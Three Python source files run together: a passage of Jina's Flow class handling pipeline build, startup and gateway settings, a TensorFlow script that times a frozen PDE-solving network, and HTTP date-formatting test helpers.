elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self) -> bool:
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted because {error_pods} could not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided, it will create a jpg or svg image with that name;
otherwise it will display the mermaid URL.
If called within an IPython notebook, the graph is rendered inline,
otherwise an image is created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting so that gateway connections are shown more accurately
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
# the header emitted by _mermaid_str is 'flowchart LR', so rewrite that for a top-down layout
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL that points to an SVG image. It requires an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the URL pointing to an SVG image
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new host address
"""
self._common_kwargs['host'] = value
# Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(self):
"""Block the process until user hits KeyboardInterrupt"""
try:
threading.Event().wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
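# Hedged usage sketch (endpoint name and port are hypothetical, not from the original
# source): with an HTTP gateway, an Executor endpoint bound via @requests(on='/foo') can
# be exposed as a REST path roughly like this:
#
#   f = Flow(protocol='http', port_expose=12345)
#   f.expose_endpoint('/foo', summary='run foo', methods=['POST'])
#   with f:
#       f.block()
#
# after which a POST to http://localhost:12345/foo reaches the Executor method.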
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** formerly the only argument this function accepted for overriding the Executor configuration
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
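# Hedged usage sketch (pod name and arguments are hypothetical): assuming a pod named
# 'encoder' exists in the Flow, its replicas can be restarted one by one with new
# arguments via
#   f.rolling_update('encoder', uses_with={'model_path': '/tmp/new_model'})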
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
# always start from the common kwargs so `kwargs` is defined even without 'port_expose'
kwargs = copy.deepcopy(self._common_kwargs)
if 'port_expose' in self._common_kwargs:
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
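# Hedged usage sketch (values are hypothetical): update the gateway/client network
# settings of a Flow before (re)starting it, e.g.
#   f.update_network_interface(host='0.0.0.0', port_expose=23456)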
|
Time_Network.py
|
import argparse
import numpy as np
import tensorflow as tf
#from reader_frozen import plot_prediction, convert_time, read_data, read_mesh, read_soln
import os
import sys
import time
import multiprocessing
import threading
import csv
# Import flags specifying dataset parameters
from timer_flags import getFlags
DATA_COUNT = 10*20*50
#DATA_COUNT = 5000
increment = 1000
batch_size = 250
#batches = 4
MODEL_DIR = "/home/nick/Research/ConvPDE/Poisson_Varying_Domain/Model_1/"
SETUP_DIR = "./"
data_dir = "Data/"
mesh_dir = "Meshes/"
soln_dir = "Solutions/"
# Load graph from frozen .pb file
def load_graph(frozen_model_folder):
#frozen_graph_filename = frozen_model_folder + "frozen_model.pb"
frozen_graph_filename = frozen_model_folder + "optimized_frozen_model.pb"
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
producer_op_list=None
)
return graph
## Neural Network
def network_times():
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", default=MODEL_DIR, type=str, help="Model folder to export")
parser.add_argument("--DATA_dir", default=SETUP_DIR, type=str, help="Folder containing dataset subdirectories")
parser.add_argument("--default_res", default=128, type=int, help="Resolution of data")
parser.add_argument("--ID", default=0, type=int, help="ID to plot")
parser.add_argument("--slice_plot", default=False, action="store_true", help="Plot a slice of the prediction/solution")
parser.add_argument("--show_error", default=False, action="store_true", help="Plot the error between the prediction and solution")
parser.add_argument("--use_hires", default=False, action="store_true", help="Option to use high resolution data")
parser.add_argument("--no_gpu", default=False, action="store_true", help="Specify if GPU is not being used")
parser.add_argument("--save_solutions", default=False, action="store_true", help="Option to save solutions to file")
parser.add_argument("--time_count", default=1, type=int, help="Time count for time tests")
args = parser.parse_args()
default_res = args.default_res
DATA_dir = args.DATA_dir
slice_plot = args.slice_plot
show_error = args.show_error
graph = load_graph(args.model_dir)
ID = args.ID
USE_HIRES = args.use_hires
NO_GPU = args.no_gpu
time_count = args.time_count
save_solutions = args.save_solutions
# Display operators defined in graph
#for op in graph.get_operations():
#print(op.name)
# Define input and output nodes
data = graph.get_tensor_by_name('prefix/data_test:0')
mesh = graph.get_tensor_by_name('prefix/mesh_test:0')
soln = graph.get_tensor_by_name('prefix/soln_test:0')
y_pred = graph.get_tensor_by_name('prefix/masked_pred_test:0')
y_scale = graph.get_tensor_by_name('prefix/masked_scale_test:0')
with tf.Session(graph=graph) as sess:
# Run initial session to remove graph loading time
"""
# Read mesh and data files
source = read_data(0, os.path.join(DATA_dir,data_dir), USE_HIRES=USE_HIRES)
data_batch = np.expand_dims(np.transpose(source, (1, 2, 0)),0)
mesh_data = read_mesh(0, os.path.join(DATA_dir,mesh_dir), USE_HIRES=USE_HIRES)
mesh_batch = np.expand_dims(np.transpose(mesh_data, (1, 2, 0)),0)
# Compute network prediction
y_out = sess.run(y_pred, feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
"""
batches = int(time_count*increment/batch_size)
#for count, batches in enumerate([int(n*increment/batch_size) for n in range(1,11)]):
for _ in range(0,1):
#count = 0
#batches = int(DATA_COUNT/batch_size)
# Start count at 1
#count += 1
#print("\n [ Loading Data ] \n")
#indices = np.array([n for n in range(0,DATA_COUNT)])
indices = np.array([n for n in range(0,int(time_count*increment))])
data_batches = []
mesh_batches = []
#soln_batches = []
start = time.perf_counter()
#mesh_array = np.load(mesh_dir + "Meshes.npy")
#data_array = np.load(data_dir + "Data.npy")
mesh_array = np.load(mesh_dir + "Meshes_0.npy")
data_array = np.load(data_dir + "Data_0.npy")
for n in range(1,time_count):
tmp_mesh_array = np.load(mesh_dir + "Meshes_" + str(n) + ".npy")
tmp_data_array = np.load(data_dir + "Data_" + str(n) + ".npy")
mesh_array = np.concatenate([mesh_array, tmp_mesh_array], axis=0)
data_array = np.concatenate([data_array, tmp_data_array], axis=0)
mesh_batches = np.split(mesh_array, batches, axis=0)
data_batches = np.split(data_array, batches, axis=0)
"""
def load_batch(n,dlist,mlist,tinds):
data_batch, mesh_batch = get_batch(n, batch_size, indices)
dlist.append(data_batch)
mlist.append(mesh_batch)
tinds.append(n)
remaining_batches = batches
step = 0
tinds = []
# Specify number of threads for loading data
THREADS = 8
while remaining_batches > 0:
sys.stdout.write(" Batch %d of %d\r" %(batches-remaining_batches+1, batches))
sys.stdout.flush()
THREADS = np.min([THREADS, remaining_batches])
threadList = []
for n in range(step,step+THREADS):
threadList.append(threading.Thread(target=load_batch, args=(n,data_batches,mesh_batches,tinds)))
for t in threadList:
t.start()
for t in threadList:
t.join()
step += THREADS
remaining_batches -= THREADS
sys.stdout.write(" Batch %d of %d\r" %(batches, batches))
sys.stdout.flush()
permute = np.argsort(np.array(tinds)).tolist()
data_batches = [data_batches[i] for i in permute]
mesh_batches = [mesh_batches[i] for i in permute]
#data_batches = np.reshape(np.array(data_batches)[permute], [-1,default_res,default_res,1])
#mesh_batches = np.reshape(np.array(mesh_batches)[permute], [-1,default_res,default_res,1])
"""
"""
for n in range(0,batches):
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
#data_batch, mesh_batch, soln_batch = get_batch(n, batch_size, indices)
data_batch, mesh_batch = get_batch(n, batch_size, indices)
data_batches.append(data_batch)
mesh_batches.append(mesh_batch)
#soln_batches.append(soln_batch)
"""
end = time.perf_counter()
load_time = end - start
#print("\n\nLoad Time: %.5f seconds" %(load_time))
#print("\n")
if NO_GPU:
print("\n [ Evaluating Network {:} ] \n".format(time_count))
else:
print("\n [ Evaluating Network (GPU) {:} ] \n".format(time_count))
start = time.perf_counter()
#for data_batch, mesh_batch, soln_batch in data:
for n in range(0, batches):
data_batch = data_batches[n]
mesh_batch = mesh_batches[n]
#soln_batch = soln_batches[n]
# SCALE INPUT DATA
scaling_factors = np.amax(np.abs(data_batch), axis=(1,2,3))[:,np.newaxis,np.newaxis,np.newaxis]
data_batch = data_batch/scaling_factors
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
# Compute network prediction
y_out, y_s = sess.run([y_pred, y_scale], feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
# RESCALE OUTPUT DATA
y_out = y_out * scaling_factors
if save_solutions:
batch_indices = [k for k in range(n*batch_size, (n+1)*batch_size)]
batch_IDs = indices[batch_indices]
for ID in batch_IDs:
filename = "./Solutions/network_solution_" + str(ID) + ".npy"
np.save(filename, y_out[ID - n*batch_size,:,:,0])
end = time.perf_counter()
## TIMES WITHOUT LOADING
#total_time = end - start
#batch_time = total_time / batches
#average_time = batch_time / batch_size
#print("\nTotal Time: %.5f seconds" %(total_time))
#print("\nBatch Time: %.5f seconds" %(batch_time))
#print("\nAverage Time: %.5f seconds" %(average_time))
## TIMES INCLUDING LOADING
ltotal_time = (end - start) + load_time
lbatch_time = ltotal_time / batches
laverage_time = lbatch_time / batch_size
#print("\n\n")
#print(" SOLVE TIMES:\n")
#print("\n - Total Time: %.5f seconds" %(ltotal_time))
#print(" - Batch Time: %.5f seconds" %(lbatch_time))
print(" ( Average Time: %.5f seconds )\n" %(laverage_time))
if NO_GPU:
filename = "Network_Times_NO_GPU.csv"
else:
filename = "Network_Times.csv"
## Remove pre-existing file
#if os.path.exists(filename):
# os.remove(filename)
with open(filename, 'a') as csvfile:
#csvfile.write("Total Time: %.5f\n" %(total_time))
#csvfile.write("Batch Time: %.5f\n" %(batch_time))
#csvfile.write("Average Time: %.5f\n" %(average_time))
#csvfile.write("\nWITH LOADING:")
#csvfile.write("Total Time: %.5f\n" %(ltotal_time))
#csvfile.write("Batch Time: %.5f\n" %(lbatch_time))
#csvfile.write("Average Time: %.5f\n" %(laverage_time))
csvfile.write("%d %.7f %.7f %.7f\n" %(int((time_count)*increment), ltotal_time, lbatch_time, laverage_time))
#csvfile.write("%d %.7f %.7f %.7f\n" %(DATA_COUNT, ltotal_time, lbatch_time, laverage_time))
# Evaluate network on specified input data and plot prediction
if __name__ == '__main__':
network_times()
|
utils_for_tests.py
|
# Python imports
import sys
import calendar
import socket
import os
import time
import threading
import datetime
from wsgiref.handlers import format_date_time as format_as_rfc1123
PY_MAJOR_VERSION = sys.version_info[0]
PY_MINOR_VERSION = sys.version_info[1]
if PY_MAJOR_VERSION < 3:
from BaseHTTPServer import BaseHTTPRequestHandler
else:
from http.server import BaseHTTPRequestHandler
# FIXME - resource warning due to this? https://bugs.python.org/issue19524
WEEKDAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
MONTHS = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
def find_unused_port():
"""Return an unused port. This code was written by Damon Kohler and it's under a PSF license.
It's from here:
http://code.activestate.com/recipes/531822-pick-unused-port/
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def format_as_rfc850(a_datetime):
"""Given a UTC datetime.datetime instance, return it formatted in RFC 850 format.
e.g. - Sunday, 06-Nov-94 08:49:37 GMT
"""
# I can't do this the obvious way -- using the formatters in strftime() -- because that returns
# locale-aware weekday and month names, and the HTTP spec requires English-only names.
RFC850_FORMAT = "{}, {:02}-{}-{:02} {:02}:{:02}:{:02} GMT"
weekday = WEEKDAYS[a_datetime.weekday()]
month = MONTHS[a_datetime.month - 1]
# Years are only 2 digits in RFC 850.
year = int(str(a_datetime.year)[2:])
return RFC850_FORMAT.format(weekday, a_datetime.day, month, year, a_datetime.hour,
a_datetime.minute, a_datetime.second)
def format_as_asctime(a_datetime):
"""Given a UTC datetime.datetime instance, return it formatted in C's asctime() format.
e.g. - Sun Nov 6 08:49:37 1994
"""
# Per Python's documentation, "Locale information is not used by asctime()" which saves me
# some work.
return time.asctime(a_datetime.timetuple())
class UTCTimezone(datetime.tzinfo):
"""The UTC timezone, because Python 2 doesn't provide one. Replaced by datetime.timezone.utc
in Python 3.
"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def dst(self, dt):
return datetime.timedelta(0)
def get_utc_timezone():
"""Return appropriate UTC timezone based on Python version"""
return UTCTimezone() if (PY_MAJOR_VERSION < 3) else datetime.timezone.utc
class MyHTTPRequestHandler(BaseHTTPRequestHandler):
"""Handler for HTTP requests from the test code.
If you are new to Python and tempted to use this code to handle requests from the public
Internet, stop! It's fine for internal-use test code but full of assumptions that would
break and/or be dangerous on the public Internet.
"""
def do_GET(self):
"""Handle GET requests that start with one of the path prefixes that I expect."""
if self.path.startswith('/encoding/'):
self._handle_encoding_request()
elif self.path.startswith('/response_code/'):
self._handle_response_code_request()
